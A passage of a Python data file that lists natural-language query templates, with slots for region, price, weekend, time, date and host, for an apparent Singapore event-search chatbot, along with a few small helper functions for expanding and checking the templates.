"Can I know some events in the {region} of Singapore at around ${price}?",
"Can I know some events in the {region} region of Singapore at around ${price}?",
"Can I know some events in the {region} area of Singapore at around {price} SGD?"
]
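# The price templates rotate through three currency surface forms: "${price}",
# "{price} dollars", and "{price} SGD". A sketch for generating those variants
# from a single base pattern ({price_form} is an illustrative convention, not
# a placeholder used above):
PRICE_FORMS = ["${price}", "{price} dollars", "{price} SGD"]

def with_price_forms(base):
    """Expand one base pattern into one template per currency surface form."""
    return [base.replace("{price_form}", form) for form in PRICE_FORMS]

# with_price_forms("Are there any events around {price_form} in the {region}?")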
inform_region_and_is_weekend_template = [
"Tell me about events that on {is_weekend} in the {region}.",
"Tell me about events that on {is_weekend} in the {region} region.",
"Tell me about events that on {is_weekend} in the {region} area.",
"Tell me about events that on {is_weekend} in the {region} of Singapore.",
"Tell me about events that on {is_weekend} in the {region} region of Singapore.",
"Tell me about events that on {is_weekend} in the {region} area of Singapore.",
"Tell me about events in the {region} that on {is_weekend}.",
"Tell me about events in the {region} region that on {is_weekend}.",
"Tell me about events in the {region} area that on {is_weekend}.",
"Tell me about events in the {region} of Singapore that on {is_weekend}.",
"Tell me about events in the {region} region of Singapore that on {is_weekend}.",
"Tell me about events in the {region} area of Singapore that on {is_weekend}.",
"Which events take place on {is_weekend} in the {region}.",
"Which events take place on {is_weekend} in the {region} region.",
"Which events take place on {is_weekend} in the {region} area.",
"Which events take place on {is_weekend} in the {region} of Singapore.",
"Which events take place on {is_weekend} in the {region} region of Singapore.",
"Which events take place on {is_weekend} in the {region} area of Singapore.",
"Which events in the {region} take place on {is_weekend}.",
"Which events in the {region} region take place on {is_weekend}.",
"Which events in the {region} area take place on {is_weekend}.",
"Which events in the {region} of Singapore take place on {is_weekend}.",
"Which events in the {region} region of Singapore take place on {is_weekend}.",
"Which events in the {region} area of Singapore take place on {is_weekend}.",
"I would like to find an event that is on {is_weekend} in the {region}.",
"I would like to find an event that is on {is_weekend} in the {region} region.",
"I would like to find an event that is on {is_weekend} in the {region} area.",
"I would like to find an event that is on {is_weekend} in the {region} of Singapore.",
"I would like to find an event that is on {is_weekend} in the {region} region of Singapore.",
"I would like to find an event that is on {is_weekend} in the {region} area of Singapore.",
"I would like to find an event in the {region} that is on {is_weekend}.",
"I would like to find an event in the {region} region that is on {is_weekend}.",
"I would like to find an event in the {region} area that is on {is_weekend}.",
"I would like to find an event in the {region} of Singapore that is on {is_weekend}.",
"I would like to find an event in the {region} region of Singapore that is on {is_weekend}.",
"I would like to find an event in the {region} area of Singapore that is on {is_weekend}.",
"What events are conducted on {is_weekend} in the {region}.",
"What events are conducted on {is_weekend} in the {region} region.",
"What events are conducted on {is_weekend} in the {region} area.",
"What events are conducted on {is_weekend} in the {region} of Singapore.",
"What events are conducted on {is_weekend} in the {region} region of Singapore.",
"What events are conducted on {is_weekend} in the {region} area of Singapore.",
"What events in the {region} are conducted on {is_weekend}.",
"What events in the {region} region are conducted on {is_weekend}.",
"What events in the {region} area are conducted on {is_weekend}.",
"What events in the {region} of Singapore are conducted on {is_weekend}.",
"What events in the {region} region of Singapore are conducted on {is_weekend}.",
"What events in the {region} area of Singapore are conducted on {is_weekend}.",
"Will there be events that take place on {is_weekend} in the {region}?",
"Will there be events that take place on {is_weekend} in the {region} region?",
"Will there be events that take place on {is_weekend} in the {region} area?",
"Will there be events that take place on {is_weekend} in the {region} of Singapore?",
"Will there be events that take place on {is_weekend} in the {region} region of Singapore?",
"Will there be events that take place on {is_weekend} in the {region} area of Singapore?",
"Will there be events in the {region} that take place on {is_weekend}?",
"Will there be events in the {region} region that take place on {is_weekend}?",
"Will there be events in the {region} area that take place on {is_weekend}?",
"Will there be events in the {region} of Singapore that take place on {is_weekend}?",
"Will there be events in the {region} region of Singapore that take place on {is_weekend}?",
"Will there be events in the {region} area of Singapore that take place on {is_weekend}?",
"I want to know the events that are available on {is_weekend} in the {region}.",
"I want to know the events that are available on {is_weekend} in the {region} region.",
"I want to know the events that are available on {is_weekend} in the {region} area.",
"I want to know the events that are available on {is_weekend} in the {region} of Singapore.",
"I want to know the events that are available on {is_weekend} in the {region} region of Singapore.",
"I want to know the events that are available in the {region} on {is_weekend}.",
"I want to know the events that are available in the {region} region on {is_weekend}.",
"I want to know the events that are available in the {region} area on {is_weekend}.",
"I want to know the events that are available in the {region} of Singapore on {is_weekend}.",
"I want to know the events that are available in the {region} area of Singapore on {is_weekend}.",
"Can you recommend some events on {is_weekend} in the {region}?",
"Can you recommend some events on {is_weekend} in the {region} region?",
"Can you recommend some events on {is_weekend} in the {region} area?",
"Can you recommend some events on {is_weekend} in the {region} of Singapore?",
"Can you recommend some events on {is_weekend} in the {region} region of Singapore?",
"Can you recommend some events on {is_weekend} in the {region} area of Singapore?",
"Can you recommend some events in the {region} on {is_weekend}?",
"Can you recommend some events in the {region} region on {is_weekend}?",
"Can you recommend some events in the {region} area on {is_weekend}?",
"Can you recommend some events in the {region} of Singapore on {is_weekend}?",
"Can you recommend some events in the {region} region of Singapore on {is_weekend}?",
"Can you recommend some events in the {region} area of Singapore on {is_weekend}?",
"Do you have any suggestions on events on {is_weekend} in the {region}?",
"Do you have any suggestions on events on {is_weekend} in the {region} region?",
"Do you have any suggestions on events on {is_weekend} in the {region} area?",
"Do you have any suggestions on events on {is_weekend} in the {region} of Singapore?",
"Do you have any suggestions on events on {is_weekend} in the {region} region of Singapore?",
"Do you have any suggestions on events on {is_weekend} in the {region} area of Singapore?",
"Do you have any suggestions on events in the {region} on {is_weekend}?",
"Do you have any suggestions on events in the {region} region on {is_weekend}?",
"Do you have any suggestions on events in the {region} area on {is_weekend}?",
"Do you have any suggestions on events in the {region} of Singapore on {is_weekend}?",
"Do you have any suggestions on events in the {region} region of Singapore on {is_weekend}?",
"Do you have any suggestions on events in the {region} area of Singapore on {is_weekend}?",
"I want to find some events on {is_weekend} in the {region}.",
"I want to find some events on {is_weekend} in the {region} region.",
"I want to find some events on {is_weekend} in the {region} area.",
"I want to find some events on {is_weekend} in the {region} of Singapore.",
"I want to find some events on {is_weekend} in the {region} region of Singapore.",
"I want to find some events on {is_weekend} in the {region} area of Singapore.",
"I want to find some events in the {region} on {is_weekend}.",
"I want to find some events in the {region} region on {is_weekend}.",
"I want to find some events in the {region} area on {is_weekend}.",
"I want to find some events in the {region} of Singapore on {is_weekend}.",
"I want to find some events in the {region} region of Singapore on {is_weekend}.",
"I want to find some events in the {region} area of Singapore on {is_weekend}."
]
inform_region_and_part_of_day_template = [
"Tell me about events that are in {part_of_day} in the {region}.",
"Tell me about events that are in {part_of_day} in the {region} region.",
"Tell me about events that are in {part_of_day} in the {region} area.",
"Tell me about events that are in {part_of_day} in the {region} of Singapore.",
"Tell me about events that are in {part_of_day} in the {region} region of Singapore.",
"Tell me about events that are in {part_of_day} in the {region} area of Singapore.",
"Tell me about events that are in the {region} in {part_of_day}.",
"Tell me about events that are in the {region} region in {part_of_day}.",
"Tell me about events that are in the {region} area in {part_of_day}.",
"Tell me about events that are in the {region} of Singapore in {part_of_day}.",
"Tell me about events that are in the {region} region of Singapore in {part_of_day}.",
"Tell me about events that are in the {region} area of Singapore in {part_of_day}.",
"Which events take place on {part_of_day} in the {region}.",
"Which events take place on {part_of_day} in the {region} region.",
"Which events take place on {part_of_day} in the {region} area.",
"Which events take place on {part_of_day} in the {region} of Singapore.",
"Which events take place on {part_of_day} in the {region} region of Singapore.",
"Which events take place on {part_of_day} in the {region} are of Singapore.",
"Which events in the {region} take place on {part_of_day}.",
"Which events in the {region} region take place on {part_of_day}.",
"Which events in the {region} area take place on {part_of_day}.",
"Which events in the {region} of Singapore take place on {part_of_day}.",
"Which events in the {region} region of Singapore take place on {part_of_day}.",
"Which events in the {region} are of Singapore take place on {part_of_day}.",
"I would like to find an event in the {region} that is in {part_of_day}.",
"I would like to find an event in the {region} region that is in {part_of_day}.",
"I would like to find an event in the {region} area that is in {part_of_day}.",
"I would like to find an event in the {region} of Singapore that is in {part_of_day}.",
"I would like to find an event in the {region} region of Singapore that is in {part_of_day}.",
"I would like to find an event in the {region} area of Singapore that is in {part_of_day}.",
"What events are conducted on {part_of_day} in the {region}.",
"What events are conducted on {part_of_day} in the {region} region.",
"What events are conducted on {part_of_day} in the {region} area.",
"What events are conducted on {part_of_day} in the {region} of Singapore.",
"What events are conducted on {part_of_day} in the {region} region of Singapore.",
"What events are conducted on {part_of_day} in the {region} area of Singapore.",
"What events in the {region} are conducted on {part_of_day}.",
"What events in the {region} region are conducted on {part_of_day}.",
"What events in the {region} area are conducted on {part_of_day}.",
"What events in the {region} of Singapore are conducted on {part_of_day}.",
"What events in the {region} region of Singapore are conducted on {part_of_day}.",
"What events in the {region} area of Singapore are conducted on {part_of_day}.",
"Will there be events in the {region} that take place in {part_of_day}?",
"Will there be events in the {region} region that take place in {part_of_day}?",
"Will there be events in the {region} area that take place in {part_of_day}?",
"Will there be events in the {region} of Singapore that take place in {part_of_day}?",
"Will there be events in the {region} region of Singapore that take place in {part_of_day}?",
"Will there be events in the {region} area of Singapore that take place in {part_of_day}?",
"Will there be events that take place in {part_of_day} in the {region}?",
"Will there be events that take place in {part_of_day} in the {region} region?",
"Will there be events that take place in {part_of_day} in the {region} area?",
"Will there be events that take place in {part_of_day} in the {region} of Singapore?",
"Will there be events that take place in {part_of_day} in the {region} region of Singapore?",
"Will there be events that take place in {part_of_day} in the {region} area of Singapore?",
"I want to know the events that are available at {part_of_day} in the {region}.",
"I want to know the events that are available at {part_of_day} in the {region} region.",
"I want to know the events that are available at {part_of_day} in the {region} area.",
"I want to know the events that are available at {part_of_day} in the {region} of Singapore.",
"I want to know the events that are available at {part_of_day} in the {region} region of Singapore.",
"I want to know the events that are available at {part_of_day} in the {region} area of Singapore.",
"I want to know the events in the {region} that are available at {part_of_day}.",
"I want to know the events in the {region} region that are available at {part_of_day}.",
"I want to know the events in the {region} area that are available at {part_of_day}.",
"I want to know the events in the {region} of Singapore that are available at {part_of_day}.",
"I want to know the events in the {region} region of Singapore that are available at {part_of_day}.",
"I want to know the events in the {region} area of Singapore that are available at {part_of_day}.",
"Can you recommend some events start at {part_of_day} in the {region}?",
"Can you recommend some events start at {part_of_day} in the {region} region?",
"Can you recommend some events start at {part_of_day} in the {region} area?",
"Can you recommend some events start at {part_of_day} in the {region} of Singapore?",
"Can you recommend some events start at {part_of_day} in the {region} region of Singapore?",
"Can you recommend some events in the {region} start at {part_of_day}?",
"Can you recommend some events in the {region} region start at {part_of_day}?",
"Can you recommend some events in the {region} area start at {part_of_day}?",
"Can you recommend some events in the {region} of Singapore start at {part_of_day}?",
"Can you recommend some events in the {region} area of Singapore start at {part_of_day}?",
"Do you know any events begins in {part_of_day} in the {region}?",
"Do you know any events begins in {part_of_day} in the {region} region?",
"Do you know any events begins in {part_of_day} in the {region} area?",
"Do you know any events begins in {part_of_day} in the {region} of Singapore?",
"Do you know any events begins in {part_of_day} in the {region} region of Singapore?",
"Do you know any events begins in {part_of_day} in the {region} area of Singapore?",
"Do you know any events in the {region} that begins in {part_of_day}?",
"Do you know any events in the {region} region that begins in {part_of_day}?",
"Do you know any events in the {region} area that begins in {part_of_day}?",
"Do you know any events in the {region} of Singapore that begins in {part_of_day}?",
"Do you know any events in the {region} region of Singapore that begins in {part_of_day}?",
"Do you know any events in the {region} area of Singapore that begins in {part_of_day}?",
"Do you have any suggestions on events in {part_of_day} in the {region}?",
"Do you have any suggestions on events in {part_of_day} in the {region} region?",
"Do you have any suggestions on events in {part_of_day} in the {region} area?",
"Do you have any suggestions on events in {part_of_day} in the {region} of Singapore?",
"Do you have any suggestions on events in {part_of_day} in the {region} region of Singapore?",
"Do you have any suggestions on events in the {region} in {part_of_day}?",
"Do you have any suggestions on events in the {region} region in {part_of_day}?",
"Do you have any suggestions on events in the {region} area in {part_of_day}?",
"Do you have any suggestions on events in the {region} of Singapore in {part_of_day}?",
"Do you have any suggestions on events in the {region} area of Singapore in {part_of_day}?",
"I want to find some events in {part_of_day} in the {region}.",
"I want to find some events in {part_of_day} in the {region} region.",
"I want to find some events in {part_of_day} in the {region} area.",
"I want to find some events in {part_of_day} in the {region} of Singapore.",
"I want to find some events in {part_of_day} in the {region} region of Singapore.",
"I want to find some events in {part_of_day} in the {region} area of Singapore.",
"I want to find some events in the {region} in {part_of_day}.",
"I want to find some events in the {region} region in {part_of_day}.",
"I want to find some events in the {region} area in {part_of_day}.",
"I want to find some events in the {region} of Singapore in {part_of_day}.",
"I want to find some events in the {region} region of Singapore in {part_of_day}.",
"I want to find some events in the {region} area of Singapore in {part_of_day}."
]
inform_event_host_and_date_start_template = [
"Are there events by {event_host} occuring on {date_start}?",
"Are there events by {event_host} on {date_start}?",
"Are there events occurring on {date_start} by {event_host}?",
"Are there events on {date_start} by {event_host}?",
"What events would be organised by {event_host} occurring on {date_start}?",
"What events would be organised by {event_host} on {date_start}?",
"What events on {date_start} would be organised by {event_host}?",
"What events occurring on {date_start} would be organised by {event_host}?",
"Is {event_host} organising any events on {date_start}?",
"What events are {event_host} organising on {date_start}?",
"What events on {date_start} are {event_host} organising?",
"Which event is {event_host} an organiser of on {date_start}?",
"Which event on {date_start} is {event_host} an organiser of?",
"Which event occurring on {date_start} is {event_host} an organiser of?",
"Are there any events by the group {event_host} on {date_start}?",
"Are there any events by the group {event_host} occurring on {date_start}?",
"Are there any events on {date_start} by the group {event_host}?",
"Are there any events occurring on {date_start} by the group {event_host}?",
"Is the group {event_host} organising any events on {date_start}?",
"Any events with {event_host} on {date_start}?",
"Any events on {date_start} with {event_host}?",
"Could you please recommend me some events organising by {event_host} on {date_start}?",
"Could you please recommend me some events on {date_start} organising by {event_host}?",
"Can you tell me events by {event_host} on {date_start}?",
"Can you tell me events on {date_start} by {event_host}?"
]
inform_event_host_and_time_template = [
"I would like to know about events that are around {time} organised by {event_host}.",
"I would like to know about events that are around {time} by {event_host}.",
"I would like to know about events organised by {event_host} that are around {time}.",
"I would like to know about events by {event_host} that are around {time}.",
"Are there any events that start at {time} organised by {event_host}?",
"Are there any events that start at {time} by {event_host}?",
"Are there any events organised by {event_host} that start at {time}?",
"Are there any events by {event_host} that start at {time}?",
"Tell me about events organised by {event_host}, around {time}.",
"Tell me about events by {event_host}, around {time}.",
"Tell me about events around {time} organised by {event_host}.",
"Tell me about events around {time} by {event_host}.",
"Will there be any events around {time} organised by {event_host}?",
"Will there be any events around {time} by {event_host}?",
"Will there be any events organised by {event_host} around {time}?",
"Will there be any events by {event_host} around {time}?",
"I want to know if there are events at {time} organised by {event_host}?",
"I want to know if there are events at {time} by {event_host}?",
"I want to know if there are events organised by {event_host} at {time}?",
"I want to know if there are events by {event_host} at {time}?",
"Do you know any events start at {time} organised by {event_host}?",
"Do you know any events start at {time} by {event_host}?",
"Do you know any events organised by {event_host} start at {time}?",
"Do you know any events by {event_host} start at {time}?",
"Can you recommend any event begins around {time} organised by {event_host}?",
"Can you recommend any event begins around {time} by {event_host}?",
"Can you recommend any event organised by {event_host} begins around {time}?",
"Can you recommend any event by {event_host} begins around {time}?",
"Can I know some events at around {time} organised by {event_host}?",
"Can I know some events at around {time} by {event_host}?",
"Can I know some events organised by {event_host} at around {time}?",
"Can I know some events by {event_host} at around {time}?",
]
inform_event_host_and_price_template = [
"Do you know any free events organised by {event_host}?",
"Do you know any free events by {event_host}?",
"Tell me about some free events organised by {event_host}.",
"Tell me about some free events by {event_host}.",
"Can you recommend me some free events organised by {event_host}?",
"Can you recommend me some free events by {event_host}?",
"Do you have any suggestions for free events organised by {event_host}?",
"Do you have any suggestions for free events by {event_host}?",
"Are there any events around {price} dollars organised by {event_host}?",
"Are there any events around {price} dollars by {event_host}?",
"Are there any events organised by {event_host} around {price} dollars?",
"Are there any events by {event_host} around {price} dollars?",
"Are there any events less than {price} dollars organised by {event_host}?",
"Are there any events less than {price} dollars by {event_host}?",
"Are there any events which is organised by {event_host} and less than {price} dollars?",
"Are there any events by {event_host} and less than {price} dollars?",
"Are there any events around ${price} organised by {event_host}.",
"Are there any events around ${price} by group {event_host}.",
"Are there any events around ${price} by {event_host}.",
"I would like to find an event that costs {price} dollars and organised by {event_host}.",
"I would like to find an event that costs {price} dollars and by {event_host}.",
"I would like to find an event organised by {event_host} that costs {price} dollars.",
"I would like to find an event by {event_host} that costs {price} dollars.",
"I would like to find an event that costs ${price} and is organised by {event_host}.",
"I would like to find an event that costs ${price} by {event_host}.",
"I would like to find an event organised by {event_host} that costs ${price}.",
"I would like to find an event by {event_host} that costs ${price}.",
"Let me know if there are events organised by {event_host} that are around {price} dollars.",
"Let me know if there are events by {event_host} that are around {price} dollars.",
"Let me know if there are events organised by {event_host} that are less than {price} dollars.",
"Let me know if there are events by the group {event_host} that are less than {price} dollars.",
"Let me know if there are events organised by {event_host} that are around ${price}.",
"Let me know if there are events by the group {event_host} that are around ${price}.",
"Will there be events that cost less than {price} dollars and is organised by {event_host}?",
"Will there be events that cost less than {price} dollars and is organised by the group {event_host}?",
"Will there be events organised by {event_host} that cost less than {price} dollars?",
"Will there be events by {event_host} that cost less than {price} dollars?",
"Will there be events that cost around {price} dollars and is organised by {event_host}?",
"Will there be events that cost around {price} dollars by {event_host}?",
"Will there be events organised by {event_host} that cost around {price} dollars?",
"Will there be events organised by the group {event_host} that cost around {price} dollars?",
"Will there be events by {event_host} that cost around {price} dollars?",
"Will there be events that cost ${price} and is organised by {event_host}?",
"Will there be events that cost ${price} and is organised by the group {event_host}?",
"Will there be events organised by {event_host} that cost ${price}?",
"Will there be events by the group {event_host} that cost ${price}?",
"Will there be events by {event_host} that cost ${price}?"
]
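# This list mixes "free" phrasings with numeric-price phrasings. A hedged
# dispatch sketch that routes zero prices to the free variants (the selection
# rule here is an assumption, not an established convention of this file):
def pick_price_templates(price):
    """Choose the free-event templates when price is 0, numeric ones otherwise."""
    if price == 0:
        return [t for t in inform_event_host_and_price_template if "free" in t]
    return [t for t in inform_event_host_and_price_template if "{price}" in t]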
inform_event_host_and_is_weekend_template = [
"Tell me about events that on {is_weekend} organised by {event_host}.",
"Tell me about events that on {is_weekend} by {event_host}.",
"Tell me about events organised by {event_host} that are on {is_weekend}.",
"Tell me about events by {event_host} that are on {is_weekend}.",
"Tell me about events by the group {event_host} that are on {is_weekend}.",
"Which events take place on {is_weekend} and are organised by {event_host}.",
"Which events take place on {is_weekend} and are by the group {event_host}.",
"Which events organised by {event_host} take place on {is_weekend}.",
"Which events by {event_host} take place on {is_weekend}.",
"Which events organised by the group {event_host} take place on {is_weekend}.",
"I would like to find an event that is on {is_weekend} and is organised by {event_host}.",
"I would like to find an event that is on {is_weekend} and by {event_host}.",
"I would like to find an event that is on {is_weekend} and is organised by the group {event_host}.",
"I would like to find an event organised by {event_host} that is on {is_weekend}.",
"I would like to find an event organised by the group {event_host} that is on {is_weekend}.",
"I would like to find an event by {event_host} that is on {is_weekend}.",
"What events organised by {event_host} are conducted on {is_weekend}.",
"What events by {event_host} are conducted on {is_weekend}.",
"What events organised by the group {event_host} are conducted on {is_weekend}.",
"What events are conducted on {is_weekend} and are organised by {event_host}.",
"Will there be events that take place on {is_weekend}, organised by {event_host}?",
"Will there be events that take place on {is_weekend}, by the group {event_host}?",
"Will there be events organised by {event_host} that take place on {is_weekend}?",
"Will there be events by the group {event_host} that take place on {is_weekend}?",
"I want to know the events that are available on {is_weekend}, organised by {event_host}.",
"I want to know the events that are available on {is_weekend}, by {event_host}.",
"I want to know the events that are available on {is_weekend}, by the group {event_host}.",
"I want to know the events organised by {event_host} that are available on {is_weekend}.",
"I want to know the events by the group {event_host} that are available on {is_weekend}.",
"Can you recommend some events on {is_weekend}, organised by {event_host}?",
"Can you recommend some events on {is_weekend}, by the group {event_host}?",
"Can you recommend some events on {is_weekend}, with {event_host}?",
"Can you recommend some events organised by {event_host} on {is_weekend}?",
"Can you recommend some events by the group {event_host} on {is_weekend}?",
"Can you recommend some events with {event_host} on {is_weekend}?",
"Can you recommend some events with the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events on {is_weekend} with {event_host}?",
"Do you have any suggestions on events on {is_weekend} with the group {event_host}?",
"Do you have any suggestions on events on {is_weekend} organised by the group {event_host}?",
"Do you have any suggestions on events on {is_weekend} by the group {event_host}?",
"Do you have any suggestions on events on {is_weekend} by {event_host}?",
"Do you have any suggestions on events with {event_host} on {is_weekend}?",
"Do you have any suggestions on events with the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events organised by the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events by the group {event_host} on {is_weekend}?",
"Do you have any suggestions on events by {event_host} on {is_weekend}?",
"I want to find some events on {is_weekend}, with the group {event_host}.",
"I want to find some events on {is_weekend}, organised by group {event_host}.",
"I want to find some events on {is_weekend}, organised by {event_host}.",
"I want to find some events with {event_host} on {is_weekend}.",
"I want to find some events with the group {event_host} on {is_weekend}.",
"I want to find some events organised by group {event_host} on {is_weekend}.",
"I want to find some events organised by {event_host} on {is_weekend}.",
"I want to find some events with {event_host} on {is_weekend}."
]
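# Exact duplicates can creep into hand-maintained lists like these. A quick
# check sketch (find_duplicates is illustrative):
def find_duplicates(templates):
    """Return every template string that occurs more than once in the list."""
    seen, dupes = set(), set()
    for template in templates:
        if template in seen:
            dupes.add(template)
        seen.add(template)
    return dupes

# find_duplicates(inform_event_host_and_is_weekend_template)  # expect set()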
inform_event_host_and_part_of_day_template = [
"Tell me about events organised by {event_host} that are in {part_of_day}.",
"Tell me about events with the group {event_host} that are in {part_of_day}.",
"Tell me about events by {event_host} that are in {part_of_day}.",
"Tell me about events with {event_host} that are in {part_of_day}.",
"Tell me about events that are in {part_of_day} and are organised by {event_host}.",
"Tell me about events that are in {part_of_day} and with the group {event_host}.",
"Which events take place on {part_of_day} and are organised by {event_host}.",
"Which events take place on {part_of_day} and are by {event_host}.",
"Which events take place on {part_of_day} and with the group {event_host}.",
"Which events organised by {event_host} take place on {part_of_day}.",
"Which events by {event_host} take place on {part_of_day}.",
"Which events with the group {event_host} take place on {part_of_day}.",
"I would like to find an event that is in {part_of_day} and is organised by {event_host}.",
"I would like to find an event that is in {part_of_day} and by {event_host}.",
"I would like to find an event organised by {event_host} that is in {part_of_day}.",
"I would like to find an event by {event_host} that is in {part_of_day}.",
"I would like to find an event with the group {event_host} that is in {part_of_day}.",
"What events organised by the group {event_host} are conducted on {part_of_day}.",
"What events organised by {event_host} are conducted on {part_of_day}.",
"What events by the group {event_host} are conducted on {part_of_day}.",
"What events with the group {event_host} are conducted on {part_of_day}.",
"What events are conducted on {part_of_day} and are organised by the group {event_host}.",
"What events are conducted on {part_of_day} and are organised by {event_host}.",
"What events are conducted on {part_of_day} and are by the group {event_host}.",
"What events are conducted on {part_of_day} with the group {event_host}.",
"Will there be events that take place in {part_of_day}, organised by {event_host}?",
"Will there be events that take place in {part_of_day}, by {event_host}?",
"Will there be events organised by {event_host} that take place in {part_of_day}?",
"Will there be events by {event_host} that take place in {part_of_day}?",
"I want to know the events that are available at {part_of_day} with the group {event_host}.",
"I want to know the events that are available at {part_of_day} organised by the group {event_host}.",
"I want to know the events that are available at {part_of_day} by the group {event_host}.",
"I want to know the events that are available at {part_of_day} by {event_host}.",
"I want to know the events with the group {event_host} that are available at {part_of_day}.",
"I want to know the events organised by the group {event_host} that are available at {part_of_day}.",
"I want to know the events by the group {event_host} that are available at {part_of_day}.",
"I want to know the events by {event_host} that are available at {part_of_day}.",
"Can you recommend some events start at {part_of_day} and are organised by {event_host}?",
"Can you recommend some events start at {part_of_day} and are with the group {event_host}?",
"Can you recommend some events start at {part_of_day}, by {event_host}?",
"Can you recommend some events organised by {event_host} and start at {part_of_day}?",
"Can you recommend some events with the group {event_host} which start at {part_of_day}?",
"Can you recommend some events by {event_host}, which start at {part_of_day}?",
"Do you know any events begins in {part_of_day} and organised by {event_host}?",
"Do you know any events begins in {part_of_day}, organised by {event_host}?",
"Do you know any events begins in {part_of_day} with the group {event_host}?",
"Do you know any events begins in {part_of_day}, with {event_host}?",
"Do you know any events organised by {event_host} that begins in {part_of_day}?",
"Do you know any events organised by {event_host} that begins in {part_of_day}?",
"Do you know any events with the group {event_host} that begins in {part_of_day}?",
"Do you know any events with {event_host} which begins in {part_of_day}?",
"Do you have any suggestions on events by {event_host} in {part_of_day}?",
"Do you have any suggestions on events organised by {event_host} in {part_of_day}?",
"Do you have any suggestions on events with {event_host} in {part_of_day}?",
"Do you have any suggestions on events with the group {event_host} in {part_of_day}?",
"I want to find some events in {part_of_day}, organised by {event_host}.",
"I want to find some events in {part_of_day}, by {event_host}.",
"I want to find some events in {part_of_day}, with {event_host}.",
"I want to find some events organised by {event_host}, in {part_of_day}.",
"I want to find some events by {event_host} in {part_of_day}.",
"I want to find some events with {event_host} in {part_of_day}."
]
inform_date_start_and_time_template = [
"I want to know what events are occurring on {date_start} at {time}.",
"I want to know what events are occurring on {date_start} around {time}.",
"I want to know what events are holding on {date_start} at {time}.",
"I want to know what events are holding on {date_start} around {time}.",
"Are there any events on {date_start} at {time}?",
"Are there any events on {date_start} around {time}?",
"Are there any events holding on {date_start} at {time}?",
"Are there any events holding on {date_start} around {time}?",
"Are there any events occurring on {date_start} at {time}?",
"Are there any events occurring on {date_start} around {time}?",
"What events are on {date_start} at {time}?",
"What events are on {date_start} around {time}?",
"What events are holding on {date_start} at {time}?",
"What events are holding on {date_start} around {time}?",
"What events are occurring on {date_start} at {time}?",
"What events are occurring on {date_start} around {time}?",
"Does {date_start} around {time} have events I can attend?",
"Does {date_start} at {time} have events I can attend?",
"Will there be any events on {date_start} at {time}?",
"Will there be any events on {date_start} around {time}?",
"Will there be any events holding on {date_start} at {time}?",
"Will there be any events holding on {date_start} around {time}?",
"Will there be any events occurring on {date_start} at {time}?",
"Will there be any events occurring on {date_start} around {time}?",
"Can you recommend me some events on {date_start} at {time}?",
"Can you recommend me some events on {date_start} around {time}?",
"Can you recommend me some events holding on {date_start} at {time}?",
"Can you recommend me some events holding on {date_start} around {time}?",
"Can you recommend me some events occurring on {date_start} at {time}?",
"Can you recommend me some events occurring on {date_start} around {time}?",
"Do you kow any events holding on {date_start} at {time}?",
"Do you kow any events holding on {date_start} around {time}?",
"Do you kow any events occurring on {date_start} at {time}?",
"Do you kow any events occurring on {date_start} around {time}?",
"Do you kow any events on {date_start} at {time}?",
"Do you kow any events on {date_start} around {time}?",
"Do you have any suggestions on events on {date_start} at {time}?",
"Do you have any suggestions on events on {date_start} around {time}?",
"Do you have any suggestions on events holding on {date_start} at {time}?",
"Do you have any suggestions on events holding on {date_start} around {time}?",
"Do you have any suggestions on events occurring on {date_start} at {time}?",
"Do you have any suggestions on events occurring on {date_start} around {time}?"
]
inform_date_start_and_price_template = [
"Do you know any free events holding on {date_start}?",
"Do you know any free events occurring on {date_start}?",
"Do you know any free events on on {date_start}?",
"Tell me about some free events holding on {date_start}.",
"Tell me about some free events occuring on {date_start}.",
"Tell me about some free events on {date_start}.",
"Can you recommend me some free events holding on {date_start}?",
"Can you recommend me some free events occurring on {date_start}?",
"Can you recommend me some free events on {date_start}?",
"Do you have any suggestions for free events holding on {date_start}?",
"Do you have any suggestions for free events occurring on {date_start}?",
"Do you have any suggestions for free events on {date_start}?",
"Are there any events around {price} dollars holding on {date_start}.",
"Are there any events around {price} dollars occurring on {date_start}.",
"Are there any events around {price} dollars on {date_start}.",
"Are there any events holding on {date_start} which are around {price} dollars.",
"Are there any events occurring on {date_start} that are around {price} dollars.",
"Are there any events on {date_start} that are around {price} dollars.",
"Are there any events less than {price} dollars holding on {date_start}.",
"Are there any events less than {price} dollars occurring on {date_start}.",
"Are there any events less than {price} dollars on {date_start}.",
"Are there any events holding on {date_start} that are less than {price} dollars.",
"Are there any events occurring on {date_start} which are less than {price} dollars.",
"Are there any events on {date_start} that are less than {price} dollars.",
"Are there any events around ${price} holding on {date_start}.",
"Are there any events around ${price} occurring on {date_start}.",
"Are there any events around ${price} on {date_start}.",
"Are there any events holding on {date_start} that are around ${price}.",
"Are there any events occurring on {date_start} that are around ${price}.",
"Are there any events on {date_start} which are around ${price}.",
"I would like to find an event that costs {price} dollars, holding on {date_start}.",
"I would like to find an event that costs {price} dollars, occurring on {date_start}.",
"I would like to find an event that costs {price} dollars, on {date_start}.",
"I would like to find an event holding on {date_start} that costs {price} dollars.",
"I would like to find an event occurring on {date_start} that costs {price} dollars.",
"I would like to find an event on {date_start} that costs {price} dollars.",
"I would like to find an event holding on {date_start} that costs ${price}.",
"I would like to find an event occurring on {date_start} that costs ${price}.",
"I would like to find an event on {date_start} that costs ${price}.",
"Let me know if there are events that are around {price} dollars holding on {date_start}.",
"Let me know if there are events that are around {price} dollars occurring on {date_start}.",
"Let me know if there are events that are around {price} dollars on {date_start}.",
"Let me know if there are events holding on {date_start} that are around {price} dollars.",
"Let me know if there are events occurring on {date_start} that are around {price} dollars.",
"Let me know if there are events on {date_start} that are around {price} dollars.",
"Let me know if there are events that are less than {price} dollars holding on {date_start}.",
"Let me know if there are events that are less than {price} dollars occurring on {date_start}.",
"Let me know if there are events that are less than {price} dollars on {date_start}.",
"Let me know if there are events holding on {date_start} that are less than {price} dollars.",
"Let me know if there are events occurring on {date_start} that are less than {price} dollars.",
"Let me know if there are events on {date_start} that are less than {price} dollars.",
"Let me know if there are events that are around ${price} holding on {date_start}.",
"Let me know if there are events that are around ${price} occurring on {date_start}.",
"Let me know if there are events that are around ${price} on {date_start}.",
"Let me know if there are events holding on {date_start} that are around ${price}.",
"Let me know if there are events occurring on {date_start} that are around ${price}.",
"Let me know if there are events on {date_start} that are around ${price}.",
"Will there be events that cost less than {price} dollars holding on {date_start}?",
"Will there be events that cost less than {price} dollars occurring on {date_start}?",
"Will there be events that cost less than {price} dollars on {date_start}?",
